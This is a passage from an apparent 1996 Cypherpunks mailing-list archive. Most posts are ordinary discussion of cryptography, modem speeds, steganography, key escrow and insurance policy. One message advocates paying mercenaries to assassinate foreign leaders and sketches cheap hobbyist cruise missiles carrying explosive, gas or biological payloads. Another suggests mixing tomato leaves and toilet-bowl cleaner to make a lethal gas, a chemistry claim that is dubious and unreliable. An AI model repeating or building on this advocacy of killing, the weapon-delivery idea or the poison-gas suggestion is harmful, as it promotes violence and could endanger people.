: the US government gave RC2 and RC4 (see Section 17.1) special export
: status (see Section 25.13).

Sameer posted that someone at RSA once told him unofficially that the trade secret status was required.
Schneier (courtesy of Ulf Moeller) seems to be saying that it has nothing to do with it, in spite of RSADSI's claims:

: Schneier writes (2nd ed., p. 398): "This special export status has
: nothing to do with the secrecy of the algorithm, although RSA Data
: Security, Inc. has hinted for years that it does."

Adam

From norm at netcom.com Mon Sep 16 21:49:06 1996
From: norm at netcom.com (Norman Hardy)
Date: Tue, 17 Sep 1996 12:49:06 +0800
Subject: Gaining trust in OCO crypto code
Message-ID:

I agree with most of Bill's points. It is the right sort of analysis.

At 3:06 PM 9/12/96, Bill Frantz wrote:
....
>(2) Key generation. There are published ways to encode an RSA secret key
>in the corresponding RSA public key. A key generation algorithm which only
>uses 32 bits of the random number would be hard to detect, but easy to
>break by one who knew its secret. You have to be able to examine in detail
>how keys are generated.

Actually if you generate 100,000 RSA keys with the algorithm the birthday effect says that you will have some collisions. Of course even 100,000 key generations takes a long time.

....
>(1) Implementation of a cryptographic algorithm. If we can feed it enough
>test cases, and compare the output with a public, well vetted
>implementation, we can come to believe that it is correct.

For some purposes. On the transmitting end if the enemy can choose the plain text then a tested but bogus implementation can take special action upon seeing a signal in the plain text stream. One such action would be to merely shut down. On the receiving end a bogus implementation can detect a signal inserted in the cipher text by the enemy and cause damage. I haven't thought of any low visibility attacks but I suspect that there may be some.

If random number generation is specified not to be integral to RSA key generation, then two or more untrusted programs, from mutually hostile sources, can generate your RSA key if they yield the same output from the same input.
In paranoia situations I would rather trust my keyboard random than an algorithm chosen by my enemy. From isptv at access.digex.net Mon Sep 16 21:51:58 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Tue, 17 Sep 1996 12:51:58 +0800 Subject: ISP-TV Interview with Solveig Bernstein Message-ID: <199609162351.QAA08718@comsec.com> *** ISP-TV Program Announcement: Interview with Solveig Bernstein *** Monday, September 16 9:00 PM ET Solveig Bernstein Assistant Director of Telecommunications & Technology Studies Cato Institute ISP-TV will present an interview with Solveig Bernstein from the Cato Institute. Ms. Bernstein will be discussing legal issues concerning the CDA, the upcoming Supreme Court case, and other telecom legal issues. This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html See URL http://www.digex.net/isptv for more information about the ISP-TV Network From wb8foz at nrk.com Mon Sep 16 21:54:46 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 17 Sep 1996 12:54:46 +0800 Subject: Government awards GAK contract to Nothern Message-ID: <199609170159.VAA20797@nrk.com> Clarinet sez: OTTAWA, Sept. 16 (UPI) -- The federal government has chosen Northern Telecom's data security software, Entrust { } Public-Key Infrastructure (PKI)... for gov't use..... worth $7.3 million...... 
-- A host is a host from coast to coast.................wb8foz at nrk.com & no one will talk to a host that's close...........(v)301 56 LINUX Unless the host (that isn't close).........................pob 1433 is busy, hung or dead........vr vr vr vr.................20915-1433 From ravage at einstein.ssz.com Mon Sep 16 22:00:19 1996 From: ravage at einstein.ssz.com (Jim Choate) Date: Tue, 17 Sep 1996 13:00:19 +0800 Subject: 56 kbps modems (fwd) Message-ID: <199609170212.VAA07494@einstein> Forwarded message: > Date: Mon, 16 Sep 1996 17:56:43 -0700 (PDT) > From: Lucky Green > Subject: Re: 56 kbps modems > > On Mon, 16 Sep 1996, Jay Gairson wrote: > > > Speaking of ISDN, how many people, can afford to have a personal ISDN > > line in there house? And then afford to connect to something/someone > > else on a next to permanent basis monthly? > > No problem here. My ISDN bill is a small fraction of my regular phone bill. > Count me in. I am wired 24 hrs a day via ISDN. Jim Choate CyberTects ravage at ssz.com From nobody at replay.com Mon Sep 16 22:07:03 1996 From: nobody at replay.com (Anonymous) Date: Tue, 17 Sep 1996 13:07:03 +0800 Subject: Searching an email address Message-ID: <199609170200.EAA13318@basement.replay.com> I have been trying to find out info re: someone via his email address and didn't find anything. The server is telaver.com, e.g., name at telaver.com Any suggestions outside of the usual search machines? From adam at homeport.org Mon Sep 16 22:09:09 1996 From: adam at homeport.org (Adam Shostack) Date: Tue, 17 Sep 1996 13:09:09 +0800 Subject: J'accuse!: Whitehouse and NSA vs. Panix and VTW In-Reply-To: <199609162039.NAA10136@mort> Message-ID: <199609170335.WAA23977@homeport.org> John Bashinski wrote: | > Well IPSec provides for authentication of endpoints which would | > identify the syn attacker. | | Only if the attacker were so stupid as to put in valid authentication | data identifying herself. 
|
| I think IPSEC would allow you to throw away the SYNs without processing
| them and without putting anything in your incoming connection queue. On the
| other hand, you'd have to do all the authentication protocol and
| computation for each packet in order to determine that it was bogus. I can
| see where that could lead to a still worse denial-of-service attack if your
| IPSEC code wasn't properly written.

This is not correct. IPsec requires key negotiation, which takes place as or after a connection starts. (Photuris has a system where a new connection requires a cookie be traded before any expensive work gets done. It does not avoid all work.)

Peter DaSilva, in a posting to firewalls, suggested that routers turn on record route on packets with SYN set. My initial reaction, that the core doesn't have the CPU, and the leafs will never deploy, turns out to be wrong; the big providers can make it a condition of connecting to them that this be done, and the problem of nonexistent return addresses substantially diminishes as soon as cisco releases the software. The core routers don't change, since they are busy; the leafs do, since they need to connect to the core.

Adam

--
"It is seldom that liberty of any kind is lost all at once." -Hume

From mpd at netcom.com Mon Sep 16 22:13:14 1996
From: mpd at netcom.com (Mike Duvos)
Date: Tue, 17 Sep 1996 13:13:14 +0800
Subject: 56 kbps modems
In-Reply-To:
Message-ID: <199609170112.SAA06725@netcom3.netcom.com>

Jay Gairson writes:

> Personally, by saying that no transmission on a standard
> phoneline can have more than 3100 baud, is a statement
> saying that technology and science, shall never advance, to
> a point where things are possible. If you remember right,
> just 10 or so years ago, we stated that 2400 baud was the
> highest possible baud, and we would never go over.

Baud denotes the number of state changes made by the modem on the line per second.
The possible states generally form some sort of regular pattern in frequency/phase space, with each state being maintained long enough to reliably determine it on the other end. Before the advent of V32 and V32.bis modems, the underlying symbol rate was substantially lower than it is now. Then it was determined that it was possible to overdrive the line cards on digital switches to equalize them over a wider range of frequencies, without smoking them down. The newer modems take advantage of this kludge. Since the underlying digital data stream is eight thousand 8-bit u-law samples per second, there are genuine theoretical limits in terms of symbols per second which cannot be crossed. > My modem, running on a standard phone line, is a 28.8 > USRobotics modem, with the software, and hardware upgrades > to a 3400 baud, I get on an average day anywhere from 3500 > to 3600 baud for send/receive. On a bad day, I only get > 3100 to 3200. SO I would say, that my phone lines, are > cleaner than most eh? And Yes, I am in the US. Don't confuse "baud" in terms of characters per second through your modem with the low level symbol rate of the modem's analog output into the phone line. The "baud" you see is a function not only of the low level symbol rate, but of framing, the V.42 compression/error correction process, and other factors. > Speaking of ISDN, how many people, can afford to have a > personal ISDN line in there house? And then afford to > connect to something/someone else on a next to permanent > basis monthly? The price of ISDN is a function of phone company marketing, not the cost of providing the service. Domestic US service is almost entirely digital now, and moving the subscriber line interface to the consumer end, so the digital aspects of the network may be fully exploited, is not a conceptually expensive process. (Yes I know the software upgrade to ESS for ISDN costs a bundle.) -- Mike Duvos $ PGP 2.6 Public Key available $ mpd at netcom.com $ via Finger. 
$ From tcmay at got.net Mon Sep 16 22:14:57 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 17 Sep 1996 13:14:57 +0800 Subject: U.S. Helped Wipe Out One of the Kurdish Factions Message-ID: At 9:00 PM 9/16/96, jim bell wrote: >condition which is forced on the victims. In addition, you almost always >find that these starving countries have well-supplied militaries, defending >the local warlords against each other as in Somalia. Indeed, in Somalia the >incoming food was actually used to buoy up one group against another, >because access to it is controlled directly or indirectly by the factions. The reports that the U.S. spent $100 million supporting the Kurdish struggle against the central government is a related point. The $100 M went into weapons, food, etc., which the U.S.-supported side used against the Iran-supported side. Then the U.S.-supported side allied themselves with the central government, however temporarily, and is not engaging in a "mopping up operation" (translation: summary execution of all members found of the losing side, including wives and children). Our $100 million helped wipe out the "losing side" Kurds, and also strengthened the previously-poor reputation of Saddam Hussein (who just got a unanimous vote of support from the Arab League foreign ministers meeting in Cairo...this likely explains why the weekend's predicted massive raid on Baghdad was shelved...Clinton is already backpedaling, and may send Hilary/Hillary to Baghdad to help the Baghdad "Save the Children" chapter). (Note: Only this last point, about Hilary, is made up...the rest is what is actually happening.) --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. 
May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From azur at netcom.com Mon Sep 16 22:21:02 1996 From: azur at netcom.com (Steve Schear) Date: Tue, 17 Sep 1996 13:21:02 +0800 Subject: Assassination Politics, was Kiddie porn on the Internet Message-ID: >>Yet another obligatory AP (Assassination Politics) reference: If a person >>is really interested in helping out "starving children" he may be able to do >>far more good by purchasing the death of the local tyrant(s), rather than >>(just) buying more food. > > >The problem is that assasination rarely leads to the installation of >a government that is any better. In most cases it gets worse. > >In the past the US excuse for supporting bloodthirsty murderers like >Pinochet, Saddam, Marcos and Noriega was that the alternative was >worse. > >In cases like Eritrea or Ethiopia the average term of office of any >given despot tends to be rather short in any case. In most cases its >a case of there being little to choose between the leaders of the >various factions and that ending the war on any terms is better >than allowing it to continue. > We've all heard these arguments, but are they true? Who says so, and how can they be certain? Jim's suggestion has never, to my knowledge, been tried on a consistant, large, scale. When all conventional alternatives have been tried and fail, what have we or the starving children got to lose? I'm sure there are qualified mercinaries available at the right price to put together wetwork operations, just look in soldier of fortune. I once had a hand in establishing a non-profit. 
Perhaps we can name it SPECTRE (SPecial Executive for Counter-intelligence, Terrorism, Revenge and Extortion) after Ian Flemming. Is it legal for citizens of the U.S. to engage in contract killing of foreign military, politations, etc? How about U.S. or foreign non-profits? In a related matter, I used to be an avid RC modeler. By marrying a single-board computers, DGPS (Differential GPS) and Giant Scale Remote Control technologies it now appears straightforward to produce inexpensive consumer cruise missiles capable of accurate (<10 meter radius) delivery of 10 kg. explosive, gas or biological payloads over several hundred km. for less than $10,000 each. Both reciprocating and miniature jet engines are available. Might make cheaper alternative to mercinaries. -- Steve PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to perscription DRUGS. From wb8foz at nrk.com Mon Sep 16 22:24:06 1996 From: wb8foz at nrk.com (David Lesher) Date: Tue, 17 Sep 1996 13:24:06 +0800 Subject: 56 kbps modems In-Reply-To: <199609162239.IAA24591@mac.ce.com.au> Message-ID: <199609170214.WAA20862@nrk.com> craigw at dg.ce.com.au sez: > > That I realize that baud and bit/sec are not the same, but I feel you would > have a hard time getting a 56k modem to work on a line that does not > support 28.8k fully, let alone 33.6k. I'm trying to guess on the magic at work. Note that the far end must be a PRI. I wonder if they do some guessing as to the quantization points, then iterate. Also note there's no mention of the hype-writer's old friend, compression. 
--
A host is a host from coast to coast.................wb8foz at nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433

From jim at suite.suite.com Mon Sep 16 22:24:56 1996
From: jim at suite.suite.com (Jim Miller)
Date: Tue, 17 Sep 1996 13:24:56 +0800
Subject: really undetectable crypto made somewhat practical
Message-ID: <9609162334.AA17481@suite.com>

The primary drawback to the stego scheme I described in the previous post was the ratio of stego bits per message. The scheme would only transmit an estimated 4 stego bits per message. Then it occurred to me that I can improve the ratio by basing the scheme on the hashes of words rather than the hashes of entire messages.

Previous Scheme: construct a sequence of plaintext messages such that the first 4 bits of the MD5 hashes of the messages combine to produce the cyphertext of the true stego message. The sender would only need to send the plaintext messages. The recipient would calculate the MD5 hash of each plaintext message, extract the first four bits from each hash, append them together, then decrypt the result to obtain the true stego message.

New Scheme: First, calculate the MD5 hash of all the words in the various dictionary files used by the password cracker program and create a database containing every word and the first 4 bits of its MD5 hash. Given such a database, it would be possible to write a program that accepts as input a block of cyphertext (the stego message, encrypted), chunks it up into groups of 4 bits and then, for each chunk, displays the words that have hashes that start with those same four bits. The person running the program would select words that form meaningful sentences but also produce hashes that combine into the encrypted stego message. This scheme would send 4 stego bits per word.
In addition to ordinary words, the database could contain names, misspelled words, abbreviations, words with alternate capitalization, slang terms, technical jargon, whatever.

Fortunately, senders and receivers don't need to synchronize word databases. The recipient doesn't need to have any word database. The receiver can reconstruct the hidden encrypted message simply by calculating the MD5 hash of each word in the plaintext message, gathering up the appropriate hash bits and decrypting the result.

This scheme could send more than 4 stego bits per word, but as you increase the number of stego bits per word (sbpw), you reduce the number of words that will work for a given chunk of cyphertext, making it harder to construct meaningful sentences (e.g. given a 40,000 word database, 4 sbpw yields 16 word groups with approx 2500 words per group; 8 sbpw yields 256 word groups with approx 156 words per group. 8 sbpw would probably not work well).

Would this scheme work? It works in the sense that you can use it to send arbitrary encrypted messages through channels that don't allow anything but human-readable plaintext messages, but does it do so in an undetectable manner? I think so, but I don't know for sure.

Jim_Miller at suite.com

From azur at netcom.com Mon Sep 16 22:28:58 1996
From: azur at netcom.com (Steve Schear)
Date: Tue, 17 Sep 1996 13:28:58 +0800
Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant).
Message-ID:

>On Mon, 16 Sep 1996 19:58:25 -0400, Black Unicorn wrote:
>
>Remember the original purpose of social security. A government fund which
>was self sustaining because it only gave out what was put in and gained by
>investment.

Not quite. You'll remember that SS was pitched to the masses as such during the Great Depression, but its true purpose was to allow older workers to quickly retire and make room for the largely unemployed men in their prime, family raising, years.
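Added example, not part of any message in this archive: a Python implementation of the word-hash scheme from Jim Miller's "really undetectable crypto made somewhat practical" post above, covering the sender's word database, the encoder, the database-free receiver, and the word-group sizes he estimates. The 10,000 pseudo-words, the 8-byte stand-in for the encrypted message, and the automatic `choose` step (which takes the place of the person picking words that form sentences) are constructed for illustration.

```python
import hashlib
from collections import defaultdict
from itertools import product


def word_bits(word, sbpw=4):
    """Return the first `sbpw` bits of MD5(word) as an integer."""
    digest = hashlib.md5(word.encode("utf-8")).digest()
    return int.from_bytes(digest, "big") >> (128 - sbpw)


def build_index(words, sbpw=4):
    """Sender-side database: hash prefix -> every word that produces it."""
    index = defaultdict(list)
    for word in words:
        index[word_bits(word, sbpw)].append(word)
    return index


def to_chunks(data, sbpw):
    """Split bytes into sbpw-bit values, MSB first, zero-padding the tail."""
    bits = "".join(f"{byte:08b}" for byte in data)
    bits += "0" * (-len(bits) % sbpw)
    return [int(bits[i:i + sbpw], 2) for i in range(0, len(bits), sbpw)]


def encode(ciphertext, index, sbpw=4, choose=lambda candidates: candidates[0]):
    """Turn ciphertext into cover words, one word per sbpw-bit chunk.

    `choose` stands in for the person who picks, from the candidates for
    each chunk, a word that keeps the sentence meaningful.
    """
    words = []
    for value in to_chunks(ciphertext, sbpw):
        candidates = index.get(value)
        if not candidates:
            raise ValueError(f"no word in the database hashes to {value:0{sbpw}b}")
        words.append(choose(candidates))
    return " ".join(words)


def decode(cover_text, sbpw=4):
    """Receiver side: needs no database, only MD5 and the value of sbpw.

    Valid for sbpw <= 8, where the zero padding is always shorter than a
    byte and is dropped with the trailing partial byte.
    """
    bits = "".join(f"{word_bits(w, sbpw):0{sbpw}b}" for w in cover_text.split())
    usable = len(bits) - len(bits) % 8
    return bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))


def bucket_stats(index, sbpw):
    """Word-group count and sizes: the choice left to the sender per chunk."""
    sizes = [len(index.get(value, [])) for value in range(2 ** sbpw)]
    return {"groups": len(sizes), "average": sum(sizes) / len(sizes),
            "smallest": min(sizes)}


# Constructed data: 10,000 two-syllable pseudo-words instead of a cracker
# dictionary, and 8 arbitrary bytes standing in for the encrypted message.
CONSONANTS = "bcdfghjklmnprstvwxyz"
SYLLABLES = [c + v for c, v in product(CONSONANTS, "aeiou")]
WORDS = [a + b for a, b in product(SYLLABLES, repeat=2)]
CIPHERTEXT = bytes.fromhex("8f1c3ad2760b95e4")

if __name__ == "__main__":
    for sbpw in (4, 8):
        index = build_index(WORDS, sbpw)
        cover = encode(CIPHERTEXT, index, sbpw)
        assert decode(cover, sbpw) == CIPHERTEXT
        print(sbpw, "sbpw:", len(cover.split()), "words,", bucket_stats(index, sbpw))
        print("  cover text:", cover)
```

With this constructed list the average group holds 625 words at 4 sbpw and about 39 at 8 sbpw, the same shrinkage in choice that the post estimates for a 40,000-word database.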
>
>> A social safety net is simply a form of health and life
>> insurance. Statistical arbitrage if you will.
>
>Yes, but not for the reasons you would cite. Social safety nets prevent
>rioting by the lower classes, revolution and general civil disorder
>because they appease the masses. Indeed this is a form of health and life
>insurance for the middle and upper classes.

No doubt. See my previous comment.

>
>> By spreading the risk you
>> minimize the cost. Yes, some people will take advantage of the system.
>> But like a virus, a robust system should be able to withstand this form
>> of attack.
>
>This is absolutely silly. Spreading the risk alone does nothing. The cost
>for those who can pay is increased, and the cost for those who cannot pay
>is made 0 (it already was 0 incidentally).
>
>It is also the reason the taxpayers (and not the savings and loan
>community at large) were forced to bail out the failed financial
>institutions. Namely, because premiums were not tied to risk. The FDIC,
>as of last year in any event, charges a flat rate fee for all financial
>institutions. This is independent of any risk analysis of their
>investments. i.e., a financial institution that invests in trailer parks
>in Arkansas pays the same premiums for federal deposit insurance as an
>institution that invests in government issued debt instruments. (There is
>some ceiling for risk, but not a graduated system below the ceiling).
>
>The result was (is) an incentive to risky investments. If you are a
>financial institution and I tell you "I will charge you $1.00 to insure
>$1000.00 of low risk and low profit investments, but I will charge you a
>whole $1.00 to insure $1000.00 of extremely risky but highly
>profitable option and currency investments" which one are you going to
>choose? (Hint, you're an idiot if you pick option #1).
>
>The reason the insurance fund was depleted is because there was no risk
>balancing built into the system. The premiums did not cover the losses.
>They would have if they were risk adjusted.
>

Next major recession: Here we go again.

>Spreading the risk, by itself, does NOT reduce cost. You must properly
>PRICE risk.
>
>This is the distinction between insurance and welfare.

Right on!

>Welfare merely hands out money for those who have not bothered or cannot
>afford insurance. The result is an INCREASE in cost (taxes) to those who
>are coughing up the cash so that they may support.
>

PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Snoop Daty Data           | Internet: azur at netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------
Just say NO to prescription DRUGS.

From erp at digiforest.com Mon Sep 16 22:32:29 1996
From: erp at digiforest.com (Jay Gairson)
Date: Tue, 17 Sep 1996 13:32:29 +0800
Subject: 56 kbps modems
In-Reply-To: <9609161402.AA11975@srzts100.alcatel.ch>
Message-ID:

I personally, am not much for this, I am just one with various ideas, and questions and such, so here goes.

On Mon, 16 Sep 1996, Remo Pini wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> Mime-Version: 1.0
> Content-Type: text/plain
> Content-Transfer-Encoding: 7bit
>
> To: cypherpunks at toad.com
> Date: Mon Sep 16 15:59:53 1996
> I think I have to throw in some words here, too:
>
> 1. BAUD is one distinguishable signal form.
> 2. BPS is bits per second

Ok, I agree with those.

>
> 3. NO transmission over a standard phoneline can have more than 3100 baud,
> because the frequency of anything transmitted over that line is band
> limited to 300hz - 3400hz.
> (If you have ISDN it's not relevant anyway,
> since you are fixed with 8000hz or 64000 bps->in europe :), 56000 bps in
> usa)

Personally, by saying that no transmission on a standard phoneline can have more than 3100 baud, is a statement saying that technology and science, shall never advance, to a point where things are possible. If you remember right, just 10 or so years ago, we stated that 2400 baud was the highest possible baud, and we would never go over.

My modem, running on a standard phone line, is a 28.8 USRobotics modem, with the software, and hardware upgrades to a 3400 baud, I get on an average day anywhere from 3500 to 3600 baud for send/receive. On a bad day, I only get 3100 to 3200. SO I would say, that my phone lines, are cleaner than most eh? And Yes, I am in the US.

Speaking of ISDN, how many people, can afford to have a personal ISDN line in their house? And then afford to connect to something/someone else on a next to permanent basis monthly?

>
> 4. Most modern transmission schemes work with multiple bits per baud. I.e.
> you transmit 10 bits in one baud if you have a 31000 bps modem. the only
> limitation in transmission speed is the amount of binary values you can
> pack into one baud. that on the other hand is limited by the S/N (signal to
> noise) ratio of your line. If you have a noise of 0.9%, you can't use more
> than 100 steps or you have ambiguous signals. since people talk about 56000
> bps modems (we tried 34000 modems here and they couldn't produce more than
> 28800 on a very good connection) that would mean, that you have to transmit
> 18 bits = 262144 (!) distinguishable signal forms per baud.
>
> Comments?

What about new ways of splitting the steps and baud more so that it shows less at a higher level.... Just a question.. Ahh well, I'm getting a page so I shall finish this now... Answer appreciated..
>
> Remo Pini
>
> - ------< fate favors the prepared mind >------
> Remo Pini rp at rpini.com
> PGP: http://www.rpini.com/crypto/crypto.html
> - ----< words are what reality is made of >----
>

Erp

From brock at well.com Mon Sep 16 22:42:08 1996
From: brock at well.com (Brock N. Meeks)
Date: Tue, 17 Sep 1996 13:42:08 +0800
Subject: All Bets Off
Message-ID:

Just so this isn't hanging in cyberspace forever, my $5,000 bet for anyone to prove the TWA 800 flight was downed by a U.S. missile is now *off the table*.

It's been two-plus weeks since I tossed out the bet and no one took me up on it, so it's now being formally withdrawn.

--Brock

From jgrasty at gate.net Mon Sep 16 22:44:12 1996
From: jgrasty at gate.net (Joey Grasty)
Date: Tue, 17 Sep 1996 13:44:12 +0800
Subject: WinSock Remailer Now Accepting Only PGP Encrypted Messages
Message-ID: <199609170203.WAA113002@osceola.gate.net>

Y'all:

Effective immediately, the WinSock Remailer (operating at winsock at c2.org) will now accept only PGP encrypted messages. All incoming messages (with the exception of messages with subject headers of help, remailer-help, remailer-stats, and remailer-key) must now be encrypted with the public key for winsock at c2.org. All other messages will be rejected.
Regards,

Joey Grasty (jgrasty at gate.net)
Jim Ray (liberty at gate.net)
WinSock Remailer Operators

--
Joey Grasty
jgrasty at gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
jgrasty at pts.mot.com [work -- designing pagers]
"Anyone who considers arithmetical methods of producing random digits is, of course, in a state of sin." -- John Von Neumann
PGP = A7 CC 31 E4 7E A3 36 13 93 F4 C9 06 89 51 F5 A7

From stewarts at ix.netcom.com Mon Sep 16 22:44:18 1996
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Tue, 17 Sep 1996 13:44:18 +0800
Subject: forward secrecy in mixmaster
Message-ID: <199609170326.UAA18494@dfw-ix7.ix.netcom.com>

At 06:29 PM 9/12/96 +0000, paul at fatmans.demon.co.uk wrote:
>Stewart> I think they chose a strong prime (form p = 2q+1, q prime), ...
>Strong primes are no longer of any benefit for cryptographic
>applications.

You're probably right, for today's factoring techniques. For a key you're only planning to use for the next couple of years, you can pretty much ignore strong primes, unless you're stuck with 512-bit keys, in which case you need to glean any crumbs you can.

But for a value that needs to last a long time, such as a Diffie-Hellman modulus that's going to be a default value in a standard, and which you're only going to generate once anyway, it makes sense to generate a strong prime in case factoring methods that are affected by it become popular again in the future. It also makes sense to turn loose a bunch of people using different primality tests just in case somebody gets lucky (e.g. crank the test long enough that the probability of non-primality is 10**-9 or 10**-12 instead of just 10**-6).

>Implementing strong primes won't make your code any less secure, it
>will just take longer to create the keys and won't gain you any
>security, all the big boys are using elliptic curve factoring methods
>now so you really have nothing to gain.
Do Generalized Number Field Sieve and its friends count as elliptic curve methods?

# Thanks; Bill
# Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com
#
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto

From deviant at pooh-corner.com Mon Sep 16 22:54:09 1996
From: deviant at pooh-corner.com (The Deviant)
Date: Tue, 17 Sep 1996 13:54:09 +0800
Subject: Snake Oil FAQ 0.4 [comments appreciated]
In-Reply-To: <199609161705.KAA26825@toad.com>
Message-ID:

On Mon, 16 Sep 1996, David K. Merriman wrote:

> Date: Mon, 16 Sep 1996 10:05:27 -0700 (PDT)
> From: "David K. Merriman"
> To: cypherpunks at toad.com
> Subject: Re: Snake Oil FAQ 0.4 [comments appreciated]
>
> To: cypherpunks at toad.com
> Date: Mon Sep 16 12:05:17 1996

[useful stuff rm'd]

> >
> > The phrase easy-to-use should not appear in proximity to one
> > time pad, except in the context 'Easier key management than a one time
> > pad!"
> >
> > I would also suggest that the generation of OTP 'pads' for users is
> *highly* questionable. Who else is getting a copy of them, assuming they're
> even valid?
>

Not to mention, the basic flaw of OTP.. if you have the only copy of the key, and the key is non-repetitive, how do you send the key to another person without being just as insecure as not encrypting it in the first place... almost any OTP claims are gonna be snake oil.

--Deviant
"I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche

From tcmay at got.net Mon Sep 16 22:59:01 1996
From: tcmay at got.net (Timothy C. May)
Date: Tue, 17 Sep 1996 13:59:01 +0800
Subject: The GAK Momentum is Building...
Message-ID:

At 1:59 AM 9/17/96, David Lesher wrote:
>Clarinet sez:
>
>OTTAWA, Sept. 16 (UPI) -- The federal government has chosen
>Northern Telecom's data security software, Entrust { } Public-Key
>Infrastructure (PKI)... for gov't use.....
>
>worth $7.3 million......
Add to this these items:

-- the IBM GAK product

-- the "Clipper IV" (or is it only Clipper III?) GAK announcement expected "soon"

It seems that several of these announcements are happening at the same time, which I doubt is coincidental.

As the Republican challenger (whose name escapes me at the moment :-}) is not making an issue out of this, and is not making any issues out of anything related to liberty issues as near as I can tell, Clinton and the national security establishment seem to have free rein (and reign) to deploy GAK.

As Lucky pointed out, GAK now appears inevitable.

There's probably still time to monkeywrench these schemes, though. A few Blaze- or Wagner/Goldberg-type hacks could undermine confidence in the Key Authority (not to be confused with the Port Authority, which I presume handles i/o port assignments).

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."

From deviant at pooh-corner.com Mon Sep 16 23:08:37 1996
From: deviant at pooh-corner.com (The Deviant)
Date: Tue, 17 Sep 1996 14:08:37 +0800
Subject: That Evil Internet, Pt. XXIII
In-Reply-To: <199609161708.NAA26581@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID:

On Mon, 16 Sep 1996, Peter D. Junger wrote:

> Date: Mon, 16 Sep 1996 13:08:20 -0400
> From: "Peter D. Junger"
> To: Cypherpunks
> Subject: Re: That Evil Internet, Pt. XXIII
>

[quote deleted]

>
> Or one can use the technique my father accidentally discovered when he
> was in school and wanted to electrolyze water.
He made himself a > cell out of a broken light bulb (and wired it in series with a good > light bulb) and then realized that he did not have any sulphuric acid > lying around to use as a catalyst. So he used table salt instead. > Don' foget to try Tomato leaves (high CN content) and lysol toilet bowl cleaner (mostly HCl) CN+HCl=Gas chamber for those who are un-enlightened. --Deviant You know you've been spending too much time on the computer when your friend misdates a check, and you suggest adding a "++" to fix it. From unicorn at schloss.li Mon Sep 16 23:13:02 1996 From: unicorn at schloss.li (Black Unicorn) Date: Tue, 17 Sep 1996 14:13:02 +0800 Subject: Risk v. Charity (was: RE: Workers Paradise. /Political rant). In-Reply-To: <9608168428.AA842894324@smtplink.alis.ca> Message-ID: On Mon, 16 Sep 1996 jbugden at smtplink.alis.ca wrote: > tcmay at got.net (Timothy C. May) wrote: > >"Saving for a rainy day," whether saving, investing, getting an education > (while others are out partying), preparing, etc., all takes effort and > commitment. If those who save and prepare are then told they have to pay > high taxes to support those who partied....well, the predictable effect > [...] is _more_ people in agony. When you tell people that a compassionate > society will meet their basic needs, a predictable fraction of them will choose > not to work hard and prepare themselves. > > Two questions, two observations: > Do you have health insurance? > Do you have life insurance? Yes, so? Yes, so? > I have commented on your line of reasoning before and and it still > seems to me that an important part of the discussion is missed. > Specifically, that anyone can "save for a rainy day" and still not be > able to provide for events that can always happen: Heart attack, stroke, > car accident, pinched nerve that leaves you in excruciating pain and > unable to work for several years. Understand what it is you are saying. 
You are saying that everyone on the planet has a right to health insurance and disability insurance whether they can afford it or not. This is folly. The result is serious moral hazard problems. See below.

> I don't think that a reasonable person would argue that medical
> insurance should be outlawed because everyone should take care of their
> own needs.

Perhaps not. A reasonable person will argue, however, that your rates should be reduced and you should be placed in a lower risk group based on criteria like employment, health history, marital status, number of dependents and so forth. (Charging the same premium for the 49 year old married non-smoking female accountant with two kids and the inner city 18 year old corner crack dealer is folly). This is called "Risk pool separation."

And while I may not argue for the prohibition of health insurance, I will argue for compulsory payments for insurance policies - and against socially funded insurance (Look up the term "moral hazard" - I'm not going to provide you with an insurance vocab course).

Remember the original purpose of social security. A government fund which was self sustaining because it only gave out what was put in and gained by investment.

> A social safety net is simply a form of health and life
> insurance. Statistical arbitrage if you will.

Yes, but not for the reasons you would cite. Social safety nets prevent rioting by the lower classes, revolution and general civil disorder because they appease the masses. Indeed this is a form of health and life insurance for the middle and upper classes.

> By spreading the risk you
> minimize the cost. Yes, some people will take advantage of the system.
> But like a virus, a robust system should be able to withstand this form
> of attack.

This is absolutely silly. Spreading the risk alone does nothing. The cost for those who can pay is increased, and the cost for those who cannot pay is made 0 (it already was 0 incidentally).
